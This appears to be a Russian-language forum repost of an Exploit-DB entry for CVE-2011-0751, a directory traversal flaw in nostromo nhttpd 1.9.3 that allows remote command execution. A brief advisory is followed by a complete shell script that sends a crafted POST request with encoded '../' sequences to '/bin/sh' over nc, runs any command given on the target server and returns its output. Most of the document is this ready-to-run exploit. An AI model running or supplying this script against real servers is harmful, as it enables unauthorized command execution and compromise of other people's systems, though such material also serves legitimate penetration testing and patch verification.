Exploit nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35466
Проверка EDB
  1. Пройдено
Автор
REDTEAM PENTESTING GMBH
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2011-0751
Дата публикации
2011-03-05
Код:
source: https://www.securityfocus.com/bid/46880/info

nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data.

An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges.

nostromo versions prior to 1.9.4 are affected.

#!/bin/sh
######################################
#                                    #
#  RedTeam Pentesting GmbH           #
#  [email protected]     #
#  http://www.redteam-pentesting.de  #
#                                    #
######################################

if [ $# -lt 3 ]; then
    echo "Usage: $(basename $0) HOST PORT COMMAND..."
    exit 2
fi


HOST="$1"
PORT="$2"
shift 2

( \
    echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
    echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'
 
Источник
www.exploit-db.com

Похожие темы